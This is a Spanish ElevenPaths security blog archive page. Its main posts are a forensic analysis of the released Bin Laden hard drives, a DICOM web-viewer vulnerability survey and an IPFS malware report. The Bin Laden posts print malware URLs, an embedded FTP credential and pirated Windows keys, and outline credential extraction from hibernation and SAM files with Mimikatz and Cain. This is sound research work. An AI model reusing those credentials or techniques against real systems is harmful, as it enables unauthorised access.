Investigando los discos duros de Bin Laden: malware, contraseñas, warez y metadatos (II)
¿Qué esperarías encontrar en los equipos que pertenecen a grupos terroristas? ¿Material super cifrado? ¿contraseñas especiales? La Agencia Central de Inteligencia (CIA) hizo públicos el pasado 1 de noviembre de 2017 materiales adicionales recuperados durante la redada del 2 de mayo de 2011 en el complejo de Bin Laden en Abbottabad, Pakistán. Ya hemos visto noticias sobre el tipo de material que alojaban (en concreto, pornografía, juegos...) pero nosotros nos centraremos en los aspectos de seguridad de los 360 GB comprimidos. Por ejemplo, contraseñas, proxies, infecciones, o algún software especial. Horas después de hacer pública la información en bruto de los discos duros de al menos tres equipos encontrados allí, la CIA eliminó el contenido debido a "problemas técnicos". Ocho días después, volvieron a publicar la información, pero en esta ocasión todos los documentos Office se convirtieron a PDF y los archivos EXE fueron "desactivados" eliminando sus cabeceras por "razones de seguridad". Analizando archivos de registro Además de los ficheros de memoria, nos encontramos con los archivos de registro. Pudimos analizar todo tipo de archivos de sistema, incluidos no solo los ficheros HIVE, sino también SAM y SYSTEM. Su análisis nos puede proporcionar las contraseñas para Windows, cuándo se usan para iniciar sesión o en servicios instalados, programas, licencias de Microsoft y mucho más. Lo que hicimos fue recuperar todos los archivos de registro e intentamos que volvieran a la vida. Estas son algunas de las conclusiones. Todos los sistemas (ALNSER-81089E22, SHAED-PC y MASOOD-A4065887 (de Masood Khan)) usaron las mismas dos licencias "públicas" de Windows XP ( QW4HD-DQCRG-HM64M-6GJRK-8K83T y RHKG3-8YW4W-4RHJG-83M4Y-7X9GW). Uno de los equipos vivo desde 2002 Como teníamos los archivos SAM, podíamos tratar de recuperar las contraseñas. Ya lo hicimos con los hiberfil.sys, pero por si acaso repetimos el ejercicio con otra perspectiva. Los archivos SAM, por defecto, están cifrados con SYSKEY... pero no hay problema aquí. Los archivos de registro necesarios para calcular el SYSKEY también los teníamos, pero mezclados. No sabíamos qué archivo SAM estaba en qué equipo o qué archivo SYSTEM vino con qué archivo SAM. Así que tuvimos que hacer un pequeño ataque de "fuerza bruta" mezclando todas las evidencias encontradas. Después de usar Bkhive, hemos utilizado Cain solo para verificarlo Algunas de las claves SYSKEY obtenidas que cifraban la SAM son 9e11eec3a1bdfa93caaa4691b08a372c, 09c6b06c839bb4bbda3d3d267f0316e4, d776321d44b86563039ae83db9becbea... Desciframos todos los archivos SAM encontrados con ellos... Pero tampoco se encontraron contraseñas, con lo que concluimos (de nuevo) que no protegían sus cuentas de usuario local. Con algunos ficheros de registro (HIVEs) y SYSTEM, podemos saber qué programas se encontraban programados al arrancar el sistema (la localización típica del malware HKLM o HKCU y CurrentVersionRun). Algunas muestras de los programas que arrancaban dos de los equipos Podemos ver dos ejemplos de dos equipos diferentes. Por supuesto, "Msn Messsenger" (con tres "s") no existe y regsvr.exe probablemente sea malware. SCVhost.exe no es svchost.exe y en winlogon (Userinit) solo debe aparecer el explorador (no regsvr.exe)... Todos al final son síntomas comunes de infección de malware, como ya constatamos en la entrada anterior. Con esta información y mirando en los lugares adecuados, podemos conocer no solo sus contraseñas sino también sus hábitos. Incluso podemos llegar a saber cuándo generalmente inician sesión (principalmente durante la tarde) o los usuarios de los equipos, así como cuándo se realizó el último login en el equipo. Respondiendo a esto último, fue el 1 de mayo de madrugada... justo un día antes de la redada de la CIA fechada el 2. Contraseñas y... contraseñas Por otro lado, también buscamos algunas ubicaciones más probables donde encontrar contraseñas. Intentamos localizarlas, por ejemplo, en la base de datos de Firefox, llamada key3.db (más algunos otros archivos JavaScript y sqlite). Pero no tuvimos suerte. Base de datos de preferencia de Firefox... sin contraseñas También lo intentamos con las contraseñas de Outlook Express, puesto que están almacenadas en el registro. A pesar de que encontramos una contraseña, no era real y parecía haberse configurado al azar durante el momento de la instalación. La cuenta de Outlook Express de Masoud, que parece falsa Tampoco había signos de gestores de contraseñas en las unidades. De hecho, encontramos una contraseña escrita en un archivo .txt y sin contexto. Y otras con algún contexto. Investigando un poco, conocemos que esta contraseña no es para ningún servicio, sino que representa algún tipo de código de activación de Office. Contraseñas para comunicación entre terroristas Pero, una de los objetivos más interesantes, suponía encontrar contraseñas usadas para las comunicaciones entre terroristas. Gracias a Metashield Protector, encontramos una dirección de correo electrónico fidaa22@yahoo.com insertada en un documento Word. Pero el contexto del archivo era mucho más interesante que el propio archivo o el correo electrónico en sí. En estas carta se envían las instrucciones para una comunicación "segura" En esta carta, el remitente recomienda que, debido a que Internet es tan inseguro, su comunicación debe ser comprimida con contraseñas en los archivos enviados entre ellos. La contraseña significa en inglés algo similar a: "No tengo objeción a lo que di, y él es de mente abierta". La carta es para Mukhtar Abi Al-Zubayr, el líder del grupo militante somalí Harakat al-Shabab al-Mujahidin, que se fusionó con al-Qaeida después de la muerte de Bin Laden. La carta alerta al receptor sobre la extensión de los archivos cifrados que se intercambien, y recomienda cambiar de ZIP a alguna extensión de archivo multimedia, como MP3 o similar. Metadatos Gracias a algunos metadatos, pudimos encontrar uno de los últimos documentos escritos desde esos equipos. La fecha se establece en el "futuro" de enero de 2012 (o incluso más adelante) para algunos de los documentos encontrados. Suponemos que la fecha de algunos equipos se encontraba configurada incorrectamente. Metashield Forensics mostrando el ciclo de vida de algunos documentos Esta carta en particular fue escrita un domingo e impresa un jueves. Pero antes de eso, fue editada de alguna manera. Primera versión de la carta de arriba. Última versión a continuación "Le había enviado una carta anterior a través del jeque Mahmoud. Le pido su número de teléfono para organizar con usted mi boda solicitada por parte del honorable jeque Abu Abd al-Rahman...". Un tiempo después añade a la carta una recomendación de seguridad sobre cómo transmitir la información: " Para el número de teléfono [con el que nos pondremos en contacto], sepárelo en el mensaje organizándolo en varias partes como fondos u objetos". Leían libros de hacking A pesar del malware, el warez y la falta de medidas de seguridad encontradas, guardaban en su disco duro un libro de hacking. Uno de los libros de hacking encontrado en uno de los ordenadores de Bin Laden Este libro, creado por el conocido " Terrorista 007 ", estaba en algún lugar de los discos duros. Es una guía básica bastante simple sobre seguridad ofensiva, creada probablemente en 2006, con trucos tradicionales y hacks "habituales". También te puede interesar: » Investigando los discos duros de Bin Laden: malware, contraseñas, warez y metadatos (I) Innovación y laboratorio innovationlab@11paths.com ElevenPaths
28 de noviembre de 2017
Investigando los discos duros de Bin Laden: malware, contraseñas, warez y metadatos (I)
¿Qué esperarías encontrar en los equipos que pertenecen a grupos terroristas? ¿Material súper cifrado? ¿contraseñas especiales? La Agencia Central de Inteligencia (CIA) hizo públicos el pasado 1 de noviembre de 2017 materiales adicionales recuperados durante la redada del 2 de mayo de 2011 en el complejo de Bin Laden en Abbottabad, Pakistán. Ya hemos visto noticias sobre el tipo de material que alojaban (en concreto, pornografía, juegos...) pero nosotros nos centraremos en los aspectos de seguridad de los 360 GB comprimidos. Por ejemplo, contraseñas, proxies, infecciones, o algún software especial. Horas después de hacer pública la información en bruto de los discos duros de, al menos, tres equipos encontrados allí, la CIA eliminó el contenido debido a "problemas técnicos". Ocho días más tarde volvieron a publicar la información pero, en esta ocasión, todos los documentos Office se convirtieron a PDF y los archivos EXE fueron "desactivados", eliminando sus cabeceras por "razones de seguridad". El extraño movimiento de la CIA ¿Se arrepintieron en menos de 24 horas y por eso publicaron una versión modificada? No lo sabemos, pero lo que sí sucedió es que, al volver a publicar todo, agregaron sus propios metadatos. Por ejemplo, ahora sabemos que utilizaron LibreOffice 5.2 (no es la última versión y presenta algunos problemas de seguridad ) para convertir documentos de Office a PDF y LibreOffice 5.0 para convertir RTF. ¿LibreOffice tiene una herramienta para convertir a PDF algunos miles de archivos? Sí, la hay. Probablemente usaron lowrite, que es capaz de convertir archivos a PDF desde línea de comandos. Usamos nuestro https://metashieldclean-up.elevenpaths.com para analizar los datos Por alguna razón, la CIA no convirtió correctamente todos los archivos .DOCX a PDF. Aquí hay un ejemplo del contenido de algunos de los ficheros. Datos un poco mezclados a la hora de convertir un PDF Estos archivos fueron incautados hace cinco años. Pero, ¿por qué tanta prisa? Ni siquiera comprobaron que los archivos se hubieran convertido correctamente antes de volver a publicarlos. En cualquier caso, según informan, durante la segunda versión eliminaron algún "malware". En concreto 815 muestras diferentes. De esas 815 muestras de " malware", verificamos contra Virustotal y obtuvimos el siguiente resultado: No encontrados: 524 Encontrados con 0 positivos: 146 Encontrados con algún positivo: 145 Al menos 146 muestras no han sido consideradas como malware por los antivirus, pero para la CIA sí. Eso no está mal, los AVs no siempre tienen la razón, ya lo sabemos... pero, al analizar algunas muestras manualmente, no vemos ninguna evidencia de malware en ellas. ¿Por qué eliminarlos? Algunos son documentos, algunos ejecutables... ¿Realizará la CIA un análisis más profundo? Eso es lo que parece. Tomamos algunas muestras aleatorias como 903A80A6E8C6457E51A00179F10A8FA8, no detectadas por ningún antivirus hasta el día de hoy, y encontramos lo que parecería material malicioso. Bien por la CIA, ¿o no? Si bien esta es la excepción (porque el archivo no parece malware si se analiza más a fondo). En realidad, hay muchos otros documentos que parecen no estar infectados de ninguna manera o que supongan un riesgo. Sin embargo, por algún motivo, han sido eliminados por ser clasificados específicamente como " malware" o peligrosos, aunque no parezca que lo sean. ¿Por qué eliminarlos entonces? Como vemos, algunos ficheros incluso .log (solo texto) han sido marcados como malware por la CIA Analizando la memoria (aunque los equipos estuvieran apagados) Hemos podido analizar la primera publicación en donde (intencionalmente o no), había archivos críticos del sistema como pagefil.sys, hiberfil.sys, registros y montones de gigas de información interesante que podían analizarse más allá de los metadatos. Al margen del tratamiento de datos publicados de nuevo por la propia CIA, una vez que tuvimos todo el material original, la primera acción "no obvia" fue analizar los pagefile.sys y los hiberfil.sys. Estos archivos son especialmente interesantes porque, literalmente, podemos encontrar cualquier cosa en ellos. En concreto, un fichero hiberfil.sys en Windows es un volcado de la memoria en sí y el pagefile.sys es el archivo de " swap", por lo que habrá trozos de "recuerdos" en memoria de diferentes procesos donde se pueden encontrar direcciones URL, contraseñas... Encontramos dos archivos hiberfil.sys y siete pagefile.sys de, al menos, tres equipos. Lo primero a lo que nos dirigimos fue a las direcciones URL. Los vídeos siempre son interesantes. Principalmente, vídeos para niños. También encontramos sus proxies preferidos para navegar de "incógnito", como http://tproxy.guardster.com. De estas direcciones se pueden deducir las URL que estarían visitando. Foros principalmente islámicos. Pero además se han detectado algunos IOC como evidencia de malware en memoria. Por ejemplo: 20080311cPxl31 (que nos lleva a un downloader de Flash, popular durante 2011), http://jL.chura.pl/rc/, http://218.25.11.147/download (un distribuidor de malware chino bastante anticuado, o eso parece), http://59.106.145.58 (relacionado con MS08-067), http://85.17.138.60/traf/fgaX, 29x67629n689 (no es un string muy común...). Estas son algunas muestras de las cadenas encontradas en memoria. Dos de ellos son especialmente interesantes. La cadena ftp://ggss:xsw2xsw2@ que se encuentra en uno de los pagefile.sys, que obviamente es un nombre de usuario y contraseña de un FTP, pertenece a esta muestra 4742ae6404fa227623192998e79f1bc6 que no parece malware popular. En ella hay algo que nos llama la atención: si la redada tuvo lugar en mayo de 2011, ¿por qué esta muestra se vio por primera vez en VirusTotal en 2015? ¿No estuvo en ninguna base de datos durante cuatro años? ¿Solo en un equipo en Abbottabad? Algo posible es que se trate de un malware genérico que cree su propio usuario y contraseña según la víctima, pero no parece el caso. Además de estro, hay otras referencias a malware en los pagefile.sys o hiberfil.sys. Este, en concreto, se ve especialmente interesante. Algunos trozos de memoria Siempre existe la posibilidad de que estos fragmentos de información en memoria no indiquen un compromiso, como por ejemplo que el usuario buscaba información sobre ese malware, firmas de AV... pero a partir del fragmento en sí, creemos que ese equipo estaba infectado. El fragmento "password sender trojan by:spyder" es realmente una pieza antigua de malware de al menos el año 2000. Un viejo fichero PDF creado por SANS que hace referencia a este keylogger Por lo tanto, aparte de los 815 posibles archivos de malware etiquetados como tales por la CIA, algunas evidencias encontradas en memoria vinculadas a otras muestras de malware (además de las evidencias que mostraremos en la siguiente entrega) nos hacen pensar que esos equipos estaban completamente infectados. Por cierto, el antivirus que mantenían instalados todos era una versión pirateada de ESET32, puesto que ejecutaban el servicio. Aunque algunos sistemas parecen contener archivos pertenecientes a AVG e incluso se han identificado algunas claves de software de Kasperksy pirateado. Pero, aparte de eso, los ficheros hiberfil.sys son interesantes por otra razón. El proceso LSASS, si se trata de la manera correcta, se puede "montar" a partir del hiberfil.sys y verificar las credenciales. Eso es lo que hemos hecho. Intentar dar con las contraseñas de los usuarios registrados justo cuando se creó el archivo. Hemos probado con el hiberfil.sys de SHAED-PC, uno de los equipos de las instalaciones de Bin Laden. Utilizando herramientas de depuración para Windows (WinDbg), Windows Memory toolkit Free Edition y Mimikatz, para encontrar contraseñas de Windows. El proceso consiste en convertir el hiberfil.sys en un formato que WindDbg entiende, encontrar el proceso LSASS, ejecutar mimikatz. El resultado fue que no había contraseñas. Sacando las contraseñas del fichero hiberfil.sys NTLM y LM son claramente nulos , por lo que podemos deducir que las contraseñas estaban en blanco. Estos ficheros contienen mucha más información, esto parece solo una pincelada de todo lo que se podría encontrar. En la siguiente entrada de blog profundizaremos en los archivos de registro, las contraseñas utilizadas para la comunicación, qué programas se ejecutan cuando los equipos se inician...Y otras revelaciones interesantes. También te puede interesar: » Investigando los discos duros de Bin Laden: malware, contraseñas, warez y metadatos (II) Innovación y laboratorio innovationlab@11paths.com ElevenPaths
27 de noviembre de 2017
Seguridad web en aplicaciones DICOM Viewers
En estos últimos meses, hemos continuado investigando acerca de diferentes componentes dentro de los servidores PACS, comentados ya en posts anteriores ( PACS y DICOM: Una “radiografía” a las debilidades y fugas de información en sistemas médicos y PacsOne Server “All bugs in One” en la gestión de imágenes radiológicas). Hemos llevado a cabo un análisis general y aleatorio de varios clientes DICOM de tipo web (DICOM Web Viewer) de diferentes fabricantes y proyectos que podemos encontrar en internet en la actualidad, ya sea a través de sus aplicaciones demos o a partir de sus instaladores (versiones free o trial). Como se imaginan, los clientes DICOM desarrollados como aplicaciones web, permiten que algún médico o paciente pueda visualizar las imágenes de una radiografía o datos de estudios realizados desde cualquier dispositivo tecnológico (computadora, móvil, etc.), gestionando con ello información sensible tanto para empresas que los implementan como para los clientes. Lamentablemente, muchas de estas aplicaciones arrastran problemas de seguridad en su código y ponen en riesgo la información de los clientes (pacientes) o la infraestructura en sí misma. OWASP Top 10 vs DICOM Web Viewers Sin ser éste un análisis de código fuente al detalle de estas aplicaciones, quisimos establecer una introducción al estado actual de estas aplicaciones web en referencia al OWASP Top 10, ya que hemos evaluado de manera superficial varias aplicaciones aleatoriamente, obteniendo así los resultados generales expresados en la siguiente matriz: Categoría en OWASP Aplica A1 – Injection ü A2 – Broken Authentication & Session Management ü A3 – Cross Site Scripting (XSS) ü A4 – Broken Access Control ü A5 – Security Misconfiguration ü A6 – Sensitive Data Exposure ü A7 – Insufficient Attack Protection ü A8 – Cross Site Request Forgery ü A9 – Using Components with Known Vulnerabilities ü A10 – Unprotected APIs ü De la mera observación, podemos deducir que en las aplicaciones revisadas todas las categorías de riesgo fueron encontradas, al menos, en una oportunidad dentro de la investigación (muestreo de 12 aplicaciones famosas en el ámbito). A fin de evidenciar lo mencionado, presentamos a continuación un caso (prueba de concepto), de los diferentes hallazgos que hemos recogido durante nuestro breve análisis. Caso A1 [Ataque de Inyección SQL permite lista información de todos los pacientes] Caso A3 [Falta de Validación permite ataques XSS Reflejado] Caso A5 [Falta de Hardening expone información técnica] Caso A10 [Falta de validación en WebServices “APIs” permite Ataque Inyección SQL] Lamentablemente, en términos generales, varios de los fabricantes de este tipo de aplicaciones no parecen poseer procedimientos que garanticen el desarrollo seguro de las mismas, basado en las múltiples vulnerabilidades web encontradas y desconocen que en su mayoría pudieran tener gran impacto tanto en la empresa que la implemente como en sus clientes. Desde ElevenPaths intentamos colaborar con las distintas industrias en mejorar sus plataformas tecnológicas, acercándoles estudios, conocimiento, tecnologías y soluciones basadas en servicios, pero nos queda claro que nos falta un camino muy largo por recorrer a todos. Cada vez que nos proponemos mirar una tecnología diferente, uno puede sentir que ha retrocedido algunos años en cuanto a los controles de seguridad existentes, sin embargo, esos problemas siempre estuvieron allí, no retrocedimos, sólo que hasta este momento no nos habíamos preocupado por mirarlo, y eso nos puede afectar directamente a todos… Carlos Ávila Chief Security Ambassador carlos.avila@global.11paths.com @badboy_nt
26 de noviembre de 2017
Historias de #MujeresHacker: Laura iglesias, experta en ciberseguridad y hacking en Telefónica
Esta semana os traemos el relato de Laura Iglesias, una de las expertas en ciberseguridad con más experiencia en ElevenPaths y una de las mujeres que cree que la diversidad en este sector puede llegar a ser una realidad en generaciones venideras. Laura Iglesias, una de las #MujeresHacker de Telefónica CDO nos cuenta su historia: El pasado miércoles iba a dar una breve ponencia sobre fraude, y el presentador que me iba a introducir, después de preguntar sobre qué iba a versar mi charla, me hizo la siguiente pregunta: "¿qué es lo que te hace única?”. Lo pensé un poco y lo primero que me vino a la cabeza fue contestarle que soy una “millennial mayorcita”, y que eso me permite entender muy bien la generación millennial y su amor por la tecnología, ya que al fin y al cabo es mi propia generación, pero también hacer de puente con la de nuestros padres y abuelos, que no nacieron en un entorno tan digital ni con tantas posibilidades. Hay muchas definiciones de lo que es un millennial, pero aparte de marcar el año 2000 como esa fecha inicial a partir de la cual entramos en la mayoría de edad, me quedo con dos características que se repiten en los que conozco y que creo que encajan muy bien con la definición de un hacker: El amor por la tecnología, un básico: los millennials no entendemos la vida sin las posibilidades que nos abre la tecnología. El descontento casi permanente con el entorno, que a mi entender es en realidad un afán permanente de superación, de ser mejor, de hacer las cosas mejor, de conseguir metas más elevadas, y en definitiva, desafiar siempre el status quo, exactamente igual que hace un buen hacker. De hecho casi podrían haber definido a nuestra generación como la "generación hacker", ¿no? Al igual que muchos millennials tuve la suerte de entrar en contacto con la tecnología a una edad bastante temprana, y he de reconocer que me enamoré enseguida. Siempre he tenido curiosidad por saber cómo funcionan las cosas: los coches, las lavadoras, el microondas, o por qué vuela un avión… y en una época en la que todavía era costumbre ir a buscar información a una biblioteca (sí sí… una biblioteca), yo iba cada sábado con mi padre y mis hermanos allí a sacar libros con los que luego aprendíamos cientos de cosas. Pero cuando por fin entró en mi casa en ordenador, ¡y el acceso a Internet! Fue increíble… Enseguida supe que quería dedicarme a eso. En aquel momento no sabía si mi trabajo sería arreglar ordenadores en una tienda o programar juegos en disquete (algún millennial se acordará de lo que son…), pero tenía claro que eso me apasionaba. Como soy de curiosidad insaciable acabé decantándome por ir a la universidad y estudiar una Ingeniería de Telecomunicaciones, pues además de aprender a programar o entender cómo funcionan los ordenadores pensaba que me abría a otras posibilidades: entender de antenas, de redes de comunicaciones, de circuitos electrónicos digitales, etc. Y de trabajar en casi cualquier cosa que quisiera. Hasta en la NASA. Y aunque la carrera me resultó un poco teórica, creo que sentó las bases para abrirme un mundo de posibilidades bastante amplio. Y desde luego me ayudó a forjar una personalidad de superación constante de desafíos, que desde entonces me acompaña. En aquel momento no fue fácil. Éramos pocas chicas pero peleonas, nunca nos amedrentamos por ser minoría, al contrario, ¡más para elegir! :) Y ante la adversidad común (esas asignaturas imposibles, esos profesores que sólo aprobaban al 10%…) era fácil hacer amigos. Compartir apuntes, dudas, risas y sueños. Aprender a trabajar en equipo. Explicarnos cosas unos a otros. Darte cuenta de que aunque te creas muy listo, no lo sabes todo, y que se llega más lejos en equipo que intentando caminar solo. Lecciones de vida mucho más importantes que todas las mates y la física que aprendimos. Actualmente, trabajando en ElevenPaths y en lo que llevo de vida profesional he podido aprender y experimentar con un montón de cosas, como programar en lenguajes que desconocía, aprender criptografía y aplicarla en una empresa para hacer crecer su negocio, entender cómo funcionan algunos tipos de malware y cómo detectarlos y combatirlos, o saber cómo identificar un ataque de hacking o cómo prevenirlo. Todo esto en un mundo que está cambiando a velocidad de vértigo, cada vez más conectado y más digital y con más oportunidades y más riesgos. Un mundo en el que cada día tengo que aprender cosas nuevas, y en el que mi trabajo constante es desafiar lo que está establecido, preguntarme una y otra vez “Y si…?”. Un mundo apasionante de posibilidades infinitas. Laura Iglesias Febrero Telefónica Cyber Security Professional Services Manager @ElevenPaths @lauraif82 Si también eres mujer y hacker cuéntanos tu historia en mujereshacker@telefonica.com o rellena el siguiente formulario para inspirar a las más jóvenes. A partir de hoy, iremos publicando las historias recibidas más inspiradoras, valientes y alentadoras. Estate atento todos los viernes publicaremos un nuevo post de la serie #MujeresHackers: » Mamá, yo quiero ser hacker » Sheila Berta, la speaker más joven en DefCON & BlackHat
24 de noviembre de 2017
Qué hemos presentado en #SID2017 (V) Special Guest: Mikko Hyppönen
Mikko Hyppönen es el CRO (Chief Research Officer) de F-Secure y nuestro invitado estrella durante el Security Innovation Day 2017, evento de innovación y ciberseguridad de ElevenPaths. Su ponencia versó sobre el futuro y sobre cómo la ciberseguridad será cada vez más importante para nuestra sociedad. La intervención de Mikko dio comienzo con una reflexión sobre las personas que trabajamos en el ámbito de la ciberseguridad. Para él, estos individuos se dedican a ayudar a la gente, utilizando sus conocimientos y habilidades, más allá de sus obligaciones para realizar algo bueno, que repercuta de manera positiva en nuestra sociedad. Vivimos en una época de revoluciones. La revolución de Internet ha sucedido en estos últimos 25 años, provocando que prácticamente todos los ordenadores del planeta estén ahora conectados. Esto nos ha generado muchos beneficios, pero también debemos tener cuidado con los “delincuentes” que operan en la red y que pueden provocarnos grandes problemas. La siguiente revolución será el IoT ( Internet of Things). Ahora que ya tenemos todos los ordenadores interconectados, debemos estar preparados para una revolución con la conexión de todo lo demás. Las tendencias que impulsan esta revolución son las siguientes: El abaratamiento del coste de conexión de los dispositivos, hasta convertirlo en prácticamente insignificante, siguiendo la conocida ‘Ley de Moore’. La miniaturización de los ordenadores ha provocado que casi todos nosotros llevemos un equipo en nuestros bolsillos, siete veces más potente que el ordenador Deep Blue de IBM, que ocupaba una habitación y que fue capaz de derrotar al campeón mundial de ajedrez Gary Kasparov en 1994. La automatización de nuestras infraestructuras que está generando que la mayoría sean gestionadas por ordenadores y, por tanto, estableciendo una mayor dependencia para su correcto funcionamiento. Estas tendencias harán que en los próximos años todos los dispositivos se encuentren conectados. Hoy en día, podemos elegir entre comprar dispositivos smart conectados que nos proporcionan funciones adicionales o elegir otros tradicionales sin conexión. Probablemente, en el futuro todos los dispositivos que podamos adquirir vendrán con la conectividad de serie y no podremos evitar que se conecten, aunque no nos presten ninguna funcionalidad adicional. Simplemente serán así porque sus fabricantes querrán recolectar los datos relativos a su uso, además el coste de su conectividad será menor que el coste de los datos recogidos. También, Mikko nos recordó que estas revoluciones no están exentas de riesgo, formulando lo que ha llamado la “ Ley de Hyppönen”, donde establece que cualquier dispositivo que sea smart ( smartphones, los smartwatchs, los smartcar, las smartcities...) es vulnerable. Aunque Hyppönen reconoce que puede ser una ley pesimista, quiere recordarnos que tenemos una importante responsabilidad sobre qué dispositivos ponemos online y cuál será su tiempo efectivo de vida, ya que todo equipo smart online requiere de un backend en cloud que hay que mantener. Por tanto, tendremos que diseñar dichos dispositivos para que continúen funcionando, independientemente de que dispongan de conectividad o no. La tercera revolución que nos espera será la relacionada con el auge y uso masivo de la IA (Inteligencia Artificial). Esta revolución probablemente será la que más se retrase ya que es la más complicada de implementar. Mikko nos anticipó que probablemente vayamos a ver enfrentamientos entre humanos y máquinas, pero no se parecerán al escenario de la película ‘Terminator’, sino más bien a personas que traten de sabotear ordenadores y dispositivos para salvaguardar sus intereses como por ejemplo su trabajo o su privacidad. Mikko concluyó su inspiradora intervención recordando que nuestro trabajo como profesionales de la seguridad, no pasa solamente por mantener seguros los ordenadores. Nuestro trabajo también es mantener segura a nuestra sociedad. Os dejamos la ponencia de Mikko para que la disfrutéis tal y como fue en el #SID2017: Rames Sarwat VP of Strategic Alliances & Partnerships en ElevenPaths rames.sarwatshacker@telefonica.com @ramessarwat
23 de noviembre de 2017
Dorothy Vaughan: matemática y primera manager afroamericana de la NASA
Ilustración realizada por Catalina Guzmán "Cambié lo que pude, y lo que no pude, lo aguanté". Dorothy Vaughan A pesar de ser discriminada por ser mujer y por el color de su piel, Dorothy Vaughan, logró ser la primera manager afroamericana de la NASA. Biografía Dorothy Vaughan nació el 20 de septiembre de 1910 en Kansas City, Missouri y murió el 10 de noviembre de 2008 en Hampton, Virginia. En 1929 se graduó como matemática en Willberforce University, Ohio. En 1943, Vaughan se unió a la Unidad Informática del Comité Consultivo Nacional de Aeronáutica (NACA), organización que luego se convirtió en la NASA. En una época en la que, a pesar de las nuevas leyes en contra de la discriminación, la mujer y los afroamericanos no tenían muchos derechos, Dorothy desafió lo que en ese momento significaba ser científico, ser mujer y ser alguien de color. Durante los principios del programa de la NASA, Dorothy junto a sus compañeras, trabajaron en el Área Oeste, área separada de los demás trabajadores, donde desarrollaban data fundamental para lograr lanzar el primer satélite. Dorothy no dejó que este hecho la desanimara y demostró que tanto ella como su equipo, eran igual de capaces de entregar un trabajo bien hecho y así aportarle a la sociedad. A medida que el programa iba avanzando, la NASA introdujo los ordenadores de IBM. Donde los demás vieron unas máquinas intimidantes, ella visionó que esta nueva tecnología iba a automatizar su trabajo, causando su reemplazo y el de su equipo. Para ello, buscó la manera de volverse indispensable. Aprendió a programar los ordenadores leyendo los manuales de IBM porque entendió que un ordenador no se podía auto programar, alguien lo tenía que hacer. Por su gran trayectoria, en 1949, Vaughan logró ser la manager de su proyecto, volviéndose en la primera manager afroamericana de la NASA. Este ascenso le dio acceso a más áreas con un mayor número de proyectos y compañeras destacadas del sector. Con esto, también se ganó el respeto de sus compañeros, quienes valoraban tanto su opinión y recomendaciones, que acudían a ella para saber quién era la persona adecuada para cada proyecto, volviéndose así la mentora y razón del éxito de muchos. Entre sus proyectos más destacados están: Manual con los métodos algebraicos para calcular las máquinas de IBM. FORTRAN, lenguaje de programación a través de la matemática. SCOUT, programa para lanzar satélites al espacio. Después de 28 años, Dorothy se retiró de la NASA. En 2016 su historia ganó atención mundial por el libro Figuras Ocultas de Margot Lee Shetterly. El libro cuenta los obstáculos que Dorothy junto a otras mujeres, como Katherine Johnson y Mary Jackson, superaron para lograr ser mujeres destacadas en las matemáticas y ciencias en épocas en que la mujer y los afroamericanos eran discriminados. Posteriormente, de este libro, se adaptó una película con el mismo nombre que logró varias nominaciones a los Oscar. ¿Qué opinas sobre la brecha de género que hay en el sector tecnológico? ¡Déjanos tu comentario! Lee el resto de posts de la serie homenaje de mujeres que han creado un hito en la historia STEM: » Sheryl Sandberg: COO de Facebook y creadora del movimiento "Lean In" » Susan Kare: una pionera e influencia en la iconografía digital » Jude Milhon: defensora pionera de los ciberderechos » Grace Murray Hopper: Inventora del Cobol y del término "bug" » Carol Shaw: la primera mujer diseñadora y programadora de videojuegos
22 de noviembre de 2017
IPFS, un nuevo playground para los desarrolladores de malware
No son pocos los proyectos diseñados tanto por organismos o empresas para la compartición de inteligencia sobre amenazas. Sin ir más lejos, ElevenPaths dispone de una plataforma de IoC para la detección temprana de amenazas sofisticadas. Sin embargo, cada vez es más frecuente identificar entre este tipo de amenazas, el uso de tecnologías descentralizadas con el objetivo de que un tercero no pueda bloquear cualquier comunicación con el C2C, la distribución de los payloads o de binarios para que siempre se encuentren accesibles. Un ejemplo de plataformas descentralizadas que han sido muy recurridas a lo largo del tiempo por determinados threat actors han sido las siguientes: La red Tor como opción para ocultar la localización de los servidores C&C. Vemos en el siguiente gráfico que esta práctica está siendo una tendencia durante este año. Figura 1. Muestras asociadas que utilizan la red Tor Para acceder a los hidden services de Tor se requiere una configuración específica del navegador, la utilización del Tor Browser Bundle o el enrutamiento de las peticiones a nivel de sistema operativo. Para facilitar el acceso a dichas plataformas sin necesidad de configurar ningún software existen los conocidos como Tor gateways que hacen de proxy entre un usuario que intenta acceder a un recurso .onion y el propio recurso, recogiendo el resultado y sirviéndoselo de nuevo. De esta manera, la comunicación con los C2C albergados en Tor puede ser llevada a cabo por gateaways, como es el caso de Tor2Web. Figura 2. Muestras que utilizan el gateaway Tor2Web. Más frecuente es la utilización de archivos torrent para la distribución de malware. Figura 3. Muestras vinculadas a archivos torrent. También es sonado el uso de ZeroNet y Freenet, pero ya menos frecuente en la actualidad. Figura 4. Uso de ZeroNet por parte de muestras de malware. Figura 5. Uso de FreeNet por parte de muestras de malware. Sin embargo, recientemente se han identificado en las bases de datos de inteligencia de amenazas de ElevenPaths, muestras de malware que estarían utilizando un protocolo relativamente nuevo como es el de InterPlanetary File System (IPFS, por sus siglas en inglés). El malware encontrado realiza resoluciones al dominio gateway.ipfs.io y ipfs.io , utilizado para el acceso a recursos de IPFS. No obstante, no se han observado descargas, motivado probablemente por el propio diseño de la muestra, la cual se construye de diferentes elementos y que las capacidades de descarga o comunicación tipo C2C mediante el uso de IPFS no hayan sido accionadas. En primer lugar, para su instalación utiliza diferentes tipos de instaladores de forma encadenada como Setup Factory Runtime , InstallCapital , Install Core o InstallCube . Con el objetivo de conseguir persistencia, utiliza diferentes técnicas como, por ejemplo, las tareas programadas del sistema . Asimismo, para evitar ser detectado realiza modificaciones en la configuración de seguridad del sistema mediante la desactivación del UAC , deshabilitando WindowsDefender y modificando el firewall de Windows . Y, además, otro tipo de técnicas comúnmente utilizadas es la utilización de DNS dinámicos o la inyección de procesos . Finalmente señalar que en los casos detectados se han encontrado muestras que incorporaban malware como en el gusano común Sality , el cual utiliza como método de propagación las unidades extraíbles y con capacidades de descargar malware adicional. Y, en otra de las piezas identificadas asociadas a IPFS, incorporaba Glupteba , un troyano que genera ingresos haciendo clic en publicidad en un sistema comprometido. El uso generalizado de este protocolo podría llevarse a cabo en el futuro debido a las características técnicas que ofrece. Al igual que se ha realizado con los torrents por su amplia utilización por diferentes tipos de muestras maliciosas, es probable que en el futuro sea necesario proteger los sistemas evitando conexiones a IPFS, con la consiguiente pérdida de fiabilidad en este sistema. Miguel Ángel de Castro Simón Senior Cybersecurity Analyst at ElevenPaths miguelangel.decastro@telefonica.com Yaiza Rubio Intelligence Analyst at ElevenPaths' Innovation Lab @yrubiosec 